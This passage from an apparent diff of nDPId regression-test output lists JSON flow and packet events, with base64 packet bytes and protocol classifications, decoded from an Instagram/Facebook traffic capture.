yqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqDId1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7440000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"thread_ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1436720950909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950909,"pkt":"QPMIw47hABsv8H60CABFAAWqgMlAAFYGaDQfDVY0wKgAZwBQ42ig4vcaLhm0z4AQADsFTwAAAQEIChPCQpUAA\/8J\/RR\/Qw44auNd5sy65M8X7sSNLvesqLPp\/hWIEgj7u\/c3G33+CGWHr5NjTBvseCa33d9vm54JLq\/16uWtfE8LiAl4wMLDP475fV1R18fJlgWHzmvfo5rv8qseyXDb2HUuXqKoKX0JEHYQ4SCsd7x2l6PL5eytk2f\/kmJp\/iODsxx2N\/N4UQwH1r7vqSLq\/y5DElOXzRARZUzbImejgsz5wOzVgeOngfBrQtGX6fL5DmkthCiZgx4mBvjCvzFR0YP1xM0OXv+CShnIqVrP5zMdqJDyzU483pE+34fsEdDMZT4JhGoy\/98gru4qi0lyXyEksrGabld776ByfJIVVp4RivH8YLNUqtpfCVBnMTiA7j\/sfl7slzSCJaM2S8tAkbhjEusFLl75fI1asIxOiRsWcrVhmx\/PbZlpNd4K8\/v2iJLC1YElBY1y9j56WJc0LPwne+0suiyX3kgj3Fb6y+5RCsQCy2EKLdhWRbyLYVKkL4lX1A\/hBl\/EQkdQU6AhwlzHoU9XC8zrf\/sv+pTGiGgMczA3HQL0c6iXziIlynBHwH6WDIGpFhs4sIl7R4Y0SaCPOZA1lnMfjRJoKCOWKLZc4VEiazWUhaMala+ExIJc2XmtrYy\/iRYyo+LY2ytYUtBbJwRglHwtVOPffxRf4sv1nIag0M0miGXxU6GsLdqvokImfUh+1xnyRB2wekFeanQUhm7KU2GNA\/Wut8I6Yh\/BrGK2ISAtFCkh5uw9+EN15dd79TckDZ5M\/1IXL8vqbu\/hTG\/JfucZfR3dz3L3c+OhdygQW8UzKVOFvvFE3uZQnd322DAH7zC3LRHAXbCjqHBmwf2whhpegjLfm6RfL+z+IzmMokA9e2qfVhZ6xYQdwpjxowXA\/a0hFuEIYBqgg2RBxOTW9B0lNexKZj7L7myCIQt5asMs3OULjIFOSJmLxUIk3Q37w4ymEfVUM4Q7YQrd2Q7D7oXQeE3jsBBmSxiRovqahgnBN4hvIeCZZMLY1uvosfkYR3vNLSiHuKZeam\/RFQJomYqTPcrO3yya\/L8n\/bJvfwlRzHWNuu76VGEBOTSmIQrzPwlvzfa91FS9xmltfjK8v2vivjQ79d9wnDovM7E8heMjng\/L76qTSur9Xu++liqI9lESwcV36\/iMv+UhBAvwlNl9yFOXzTHExcfuKxDjy2WcT\/yjID\/XwdhLUHYsgQ9jzrKZiitJYPrb03G\/4eqDHUUFspftslQp6lFXZbtMgT+PtX+iul7L97VDMHXGdwaI8TzZ6\/jXre8vnY2F+CmIZKNEjnJpMB39UHX\/p7\/3FfZpIUwHcB3IlgFw2RAH5dbcIGzC1nhuJYVIQctqJ04wUFMG9bZhr46HZ73BXAQuUhUW68mxXOEcSUvu6IiD4944qVAoG\/m5vfXCzer8TXXbtxGJy\/lJZWKxmuOzEdM\/69tZAld3d7Oi+E\/\/wSXdP1F9r8RHsvFnMaKa\/Gb3fFq120z5cfUI5ObITs4O5x1e\/k2SP4T55SQ1l\/\/E7jbfd3y\/W+K4YanQb4PNdLvnwtOUEVU10v172Jve733E93FYrd8\/r7COigUu\/j7zMkQoWBxC6yXxRL8fBFpX1\/jifjboOb9QR4q79l+S7kBZXF3dpMduttP55\/mpWYFflzvfd\/Hx+Ie9ijit30tVfYliZvDoVqX8Iibo18xmX2SURsTLcDlv6t9hYNRdUnFiX1r9e4\/4uD+iVcRBUU8hc0fHv5tu\/ghpv97F5dOxeZj2CiEjpYqtM2N6y9Ex9X2v34njvtqIprtcVwGtsEjAY8n2yd95fX6LnY6678J3vfovd9+pLl7ZMl\/\/3mgopvtAOiqdmdl8m1KgVxW1IDqxnD5Yq+7jVsvs"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1436720950910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720950910,"pkt":"ABsv8H60QPMIw47hCABFAAA0TetAAEAGtojAqABnHw1WNONoAFAuGbTPoOL3GoAQH8w2dwAAAQEICgAD\/xATwkKT"} -02380{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1436720950911,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950911,"pkt":"QPMIw47hABsv8H60CABFAAWqgMpAAFYGaDMfDVY0wKgAZwBQ42ig4vyQLhm0z4AYADulrQAAAQEIChPCQpYAA\/8JIuSEmFKcHvUO79IuA4AtgLK1ooHfe\/xvCx6EanjcjDye5qfYfg99btIFMlfpEyS0+WXx48YQQIBKyWOQayb5WbhMWSz8Ru7MV\/a5RJtywzl84iv9BLl6PdqXz3kxPZm4yY8HdjILE3vdfyWVN0pVFaKK+f+Osc32N80bLx0naY6\/StT9w4Neeouf2Tn\/vkhhHb5a5vAV9Sx5efQ\/Fatqq174n5ea7v9ir3vf4yK3Pnlx3v3fywdfv\/ld3jdWI6CQY9xByO962aeABxBaD0Ff8vq65YOluUkGW\/xG5p7nyyq1NumgVeaWXPx2O3qpBCTyam4Mj9KNa9CLu77T788mzfZZLswHVfevJGWxpG6er55a4je67Jde+KzsbHfq771q7M2+z\/WWJw+2E3Gv8+Ffd+tBC77nzd2bXmu\/clj6qf9o8rFbG7XiKrvvv6XxVyXfvsflY+OxHlh7gk3Z3+CHdjx7fieVi8bxm781fQKvN8eNlagx6Pt3\/NOSAfXLBsZ085Sli5c\/HVLg4fEITYcZuYfT1VtMLoUR\/it2aocyhvwSZMTvD5t065r2N7JUsZycS8vq283r4S3bSl8\/xBhG2Ci5YyWnWnN8pxV7z+JfURJd7rip6XefL+Ju6T2Uxe8n5uUueW8j7FWxyhWWeGt2YWoIb6BgT6P7uCHnx\/HwXcNPzZiXBYPY6liIwioP5BO9O7zdXvrl6Ju71WJu93dF9e+W764JLl\/1aJkh+a8yX4S4lMe7dI+73eX7WiDQUaZve75ZfLkLUJX2tpOX0s4hxEi8nbq2h\/\/mvflq9RBfYRrfTdMUcVv5e78i9rwQyT\/Sl\/1zQY9T8g\/Uty51S6PL8o6JLB8VrQkT8ugJnmu83Eyez2e5Qy1+W7Aw4JHINbEb3Lj395YP7YvjhcMBXfvXJ44Z+Ixmnuj5fXvqryZ8aIvNfJRrTESolEZ4VaoKtE96vFFfwld9u321frxC3vvk10K23e7KuXiuSPeX78kEfFYr7eXpJxFpezOY6TshceqnnmzDJNaHyWEjeK+xtg7siFQxNUarW6raVTT\/fwlt3m1+qIhVuJsRCxFdbFXtQf9\/RdIuTCv1R7IUVly5mtgVW\/5h5d378ta7e\/5QkWm71LXLL\/Y\/yuCATBPFbu75ZM1tF4Xr2urFPeZ1jp6PYqu0ysRtkUSKOnvSvJ9F0HEq\/Rr4RDbTxd+7uU\/Q0X5NSa4riJq7\/YqaIUW4dNr2MWX30vRqr09mqvna6y\/VdiohYPHuWzpM\/5V791hHspd591pkzSvTJiOetcEmlGTx05fm5r+E5WPIYg3+Ld5OiDJCb38Xd9ysF92RKCKwntddXfaT3LP\/4K7yaDr4HbV6D7vh8Ru7u\/ShH0gWZxKK93e\/u7nhshKX\/8u99ZHz6WcFOZh7FbiudjfLamk58fUJd3H2j6sTr\/E4xQhYhPxokXSHH53b6EIn4I8kGvoiAAQAAAAAAACAYAavAAAAAgECXIEAAAAAAAAAAAAAAAACAAWcAAAAZwAAAAUAAQABAAAAAIBgBrAAAAACAQJcAQAAAAAAAAAAAAAAAAIABZwAAABnAAAFoQABAAEAAAAAgGAGsQAAAAIBAlwBAAAAAAAAAAAAAAAAAgAFnAAAAGcAAAs9AAEAAQAAAACA4AayAAAAAgECXEEAAAAAAAAAAAAAAAACAAFNAAAAZwAAENkAAQABARggBwEYIAcAABVgQZrjwgqFiDcfxdYWFjNTGhc\/+kWorCzCP06aQacK5fU3p2bDv4QjGkzRtJEnNbVPk\/10ykQi0ZJ4s6VFQ2Ko59C0bD2u1KUtTyS\/\/DlRe1HhoMlOd6CAkkRYQkwPPOx2Ho6SCe9GzaPNROS+"} -00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952553,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720952553,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952553,"pkt":"QPMIw47hABsv8H60CABFAAW+RXVAADMGTWwCFuwzwKgAZwBQrHcqB5rC6nVWeIAQAeYA6gAAAQEICmBlKDgAA\/+vNN9ULewTHBOFuxeelHDOvSnlSV1MyHTuCPSU99J+Rb8TuXzL6L8kVMT9JeX\/AEeHJMKvc8yfZQDY5nhAsWaIx3cLbY2ubZRDNurbaUASgAZ45AKigq45hruCoLni5pLmg59eiPd\/MiN87txVNMyFgkWsWfkcvPvLq3ncGqOJteWDTNpm8JnDNe\/V0S2KHy+GaSkVk8YYmWOQdL4xuwexnBqduXqVc8IuuI9MY+Zt8cnTPcsfLLIlpNfPzE+aRdsInsLztgb98N0mNzOHWHNTZrWKQPr9F5EE8pK7KRl773oe+7TTr1byuTp17xSTo5toqt17OaKtyATyBsMufY15yTPDfHSZYsAADIDSioIAAAHiqKF1TXzn1tX21U6idxttVoiynCqd8u3uesClb\/XTWQXOtPYUXP50lMJRzX9QM7C64zEeROD4ZaaRjli0mWIjfY1adjPenj65KGzqNXJTVghI+6I9UuSYsusH3FlxFno1c9JW3qbWRHfo32lBRAAGeChkqKC5IoYXnRl6Z3L5dCnLn26mSNOSOlqcea5o+UReR652+3d2\/Dab0zb9PXGqPSSLVDbNYRN6MtmpYbJEJLFdJ2RaURdiZY5h0OrU5h7IeY888nVsXnwm4oxv7JWfA68vLc8ehxYrmuOvDGouaBzaCTVP8+zXrnlnrxCWO9ezKKfpVjom7FpO6KTzNl60JdWhqz19c1yubV3UpRimqVV2W9Iuz4HPYBS04ZbGvOuvLXvjiZYsyxAFADSAAAIAHiqKCLcMvDzel9taKZLs5gp0t2Sh58L9ypUAXrhU0aeiss785JfFQgziXCyntnoKqRxzXlrlhljpCKihlu1P7THj6681RUYywmYQzKyhFbllawrlLFUK21TYahBMm4bB0c\/Q0qorQAApkAqZAqooYd7fNpcf2zJkmmfqN4IOKohvY2dlqWGThFbWF\/iVS78WnnJ2uDHuZI98fVGcac2Zm9mcm1UZY5ht7uDaF69Ec7stO3DjzT4G5waWu1vkbTUs3N04NR5d+uk9NE0xVVXqfWMDHPBz3TyJ2pj1SeiHvpcNbNaNfVk2d++zGVKltAVHjbncFMYehMEedktrQOr+f0lWrmtUm+5kDyFpIAAACABpAAAEADxUAvSVxiQ0ufh6dafDwdvPJvem8y03645umpEvJ0dXO8bOVZrlo6+6HRHb0ou72TKnrj5KPN7\/AOgKGio1hlhcLnqyF3+tvLXsSbkfin2t4tioTO4NYFQ\/cjnql8XXv1hza9+0Ud7jZRwM7yzJxDp5um5UBpRFBRFDJUAyXHIMLhp62c7n0OsJjy0iGfHrFKd3PzhU8hjD\/pFzODc\/Y6udSW9S1xmy97TUsc6rydtdS82Etsi8jjdrKKSuKgmeOTOnu4nJHsh6YHzk6+ZUwTisdkMdqJMzvOrXOshOkK636OrSLZYJJHZcArm2apudeK4tWc27cstemRx+TikdR37SEPju+kLssw2Gc1wOvJ2hIdaYk1zq07Iu2KUuuldIaeHl165wzJM2tQDAAEFA0ACABgAIKiLtm1f2FaZdGxIrg19HJLzj8n4Ypnc+B3T5H9i6KUpcY+86xxUVeVESMl8UPe1Kc82\/VTk3j\/1J5ak58ckqUUUN\/rfyR6eHcXir2n4sx0h9l1nO6iWmGyLxxNiNJu0g3Ybk0hqbHRqCIdPN0XOQitAAKqALljkCrjkGF2Uncud2zD5hCufWAuzR3tSLQmaqnX6OSXbK53hgkuOsgpG7qQpZRqSR+oidlVpZdTrxXdIxxKXxG1ojMpizEzxzZ0OrW7I9gvrG+cnXo1beEccjsojNZyrk6C5qrW4NVKD9vH1VFwxWVxccbqS2Yg5iCSbQN4k01rSK6ZNFZW1N6VuWn84="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952553,"pkt":"ABsv8H60QPMIw47hCABFAAA0quZAAEAG4ITAqABnAhbsM6x3AFDqdVZ4KgegTIAQAtavfwAAAQEICgAD\/7RgZSg4"} -02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1436720952555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952555,"pkt":"QPMIw47hABsv8H60CABFAAW+RXZAADMGTWsCFuwzwKgAZwBQrHcqB6BM6nVWeIAQAeZ8mQAAAQEICmBlKDgAA\/+vtV20fc9mrp1dM1zdmjppSPVtJK34O3VnVq0beVF65xNDXtnFMscw0gMAAAA0IoJBUBRFARUHcs5g82pbGbtawVs6OSKR1bUyvV0dTgqje3NxuXVMt1wlAegfPgme8KPvNkyz2Nzpho206rca8VQBcVDdd9H2q16p8Xe1\/FGG0PnMFm95yjbzbc7y6uXqTNGzWHDjlr1zbmh3aAiPRz9FJQBKIrBUUFyxyAyxUMbqpW7M7s+HSqN8+tay6O9jTtj28wUzIo\/I9c7sc2SRY7SGir2ou5wYpBHamL2VXdh1GOfOiG2KSWK0ZRWURgMc8c2dLwzO6PYryxPPJ14tXbyVLEzu7AiS6csbmt9Otxqax6NG+4uWLSiIMYORwY5GrXsyVyji63ZEef2CRuZlT9tVLFa7rpa4rN2GvKa6elt72n7oBKscxMtLQoy7qN1yh+eGrfONLhtDQAwAAEA0gCRQARQaoCLnm9fzqjnZ3VrTw09XILe19+jPTt59nHFRbU0OOuNydnD0UHny+qEQy39QN7UThl7edlc1nfdBowRUELhmGc+r+yWewvFPtPxXnpDZ1BZmRK8zLPQ38W8W\/X1YhH8M9eufC2d\/AOI79G+kqiNKqKAqKC5YqC5IoY3XSd0Z3Y8akkew1rnv4HkTku3FOmJHHJJtncsjjclx1kPn70JQGkcLY6tNQ0zKJTVjWvXtSZIzLIrSwjEmjQ8c8c2dDq1OqPYLu39fJ1betucGQOPuDRUSXa1cLIpt3N2mddd7Y5VNmsbw2Da2\/vbQiUjZHiNOuRQ2ZSRqRNXXUTanbbp9PbdNN2jY6tLkwRT\/ANjbmOa9UE6Uotjv45c4hUhaamqOkXoyhy4okgDYACCgaABAAIoAADuWUw2fta4zKI7NJxuGVLi29HLne+NvcdlxB1aHHXK2+xtdVSUBfVAg1XrRV5tTjh624ct8i+wPNScORUqMc8Mwy9A0D69VT7xd7V8U53E5jD5vecyw6sYrVuz2BjjtWSJ8nbzbRwtr0xDjG\/RvaURWshFABQXLDMBUUMbnpi4stLLjsnZ8NankEdmWkdab9Muk5DH3nTO4pEwOWG8yo2aQrXLjZXdiuNM0hcyDVu59yGWKyiLXOcZkMeVY7MM2dDs0OqPZPZydXJ159bc5NQmJyqJ1n3Y9HE20x57YdM68dmx\/qZ\/xubZFscff4rR1u4z59Nv1lM66iJZ3x2S6YP1M3XSpWVsVDbdy6xp4Yopxy1ire9NXUDdH5QwofuPrbhV5y8si6MKyVFHiAwABRANQgJRFAEAFRQtucQmaM4mXub5p95Oznuefj688r5I9Io3NRJy4pPrlN+ht2Ku6h\/QXn5ptuulbZCyuVgkTcvo6\/Kxzrz2meGueGWOSOn3F4n9xzTh4w9X+ac6rWdQ67Ljk1S7rhwtJ3i1X+cw4WoLju5KMI5Io4ONbtW2kog1kACqiguWGYCooYz6ATTO7t5HXhw1qebQF2qZdp0cidTv0Xe9srme4048++yBSFg0z42SRtNxxS2IytrHPX1Ij8Vk7Fa5o\/JWGa5s9+xmDrx9qPYDw1O\/L1a89e2KisZlDBefSxSPipRRjkzbpFVvfK43E7weGqLi0clcfofITO4hnvIobM4rryyF2jrvNWRSt60dFarYqu52R3e5aM9G\/a4brng6ZBkiCt702S5fDbSrWoq\/NToyhaKjMRAFBAUANYAkUAEUBFQHbM3h00ta4zJY\/J3bGvNV08O1ZZGZNGYqLS2JzrXKQObG9Rfd54v2gqlsvGjrpY\/dvL3jmUMnMFz0834bMNsda54g8+w\/HfreHt8+XvQ8OvrspC67h\/dIPKIblw4peerNFqYI1OTSaIwPLKqjmzXmxQGlXFQVcVBVxyBVxUM4="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAABZAuBAAEAGAfDAqABnLiFGn+VCAbsSlgM32Tfr4YAYA4n5fAAAAQEICgAD\/7VWGIoUFQMBACAs4KplPbzXnvu9o5LJf4SK8seDxrub6gsxIshtI3HaOA=="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"} +02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEprDfFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7560000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 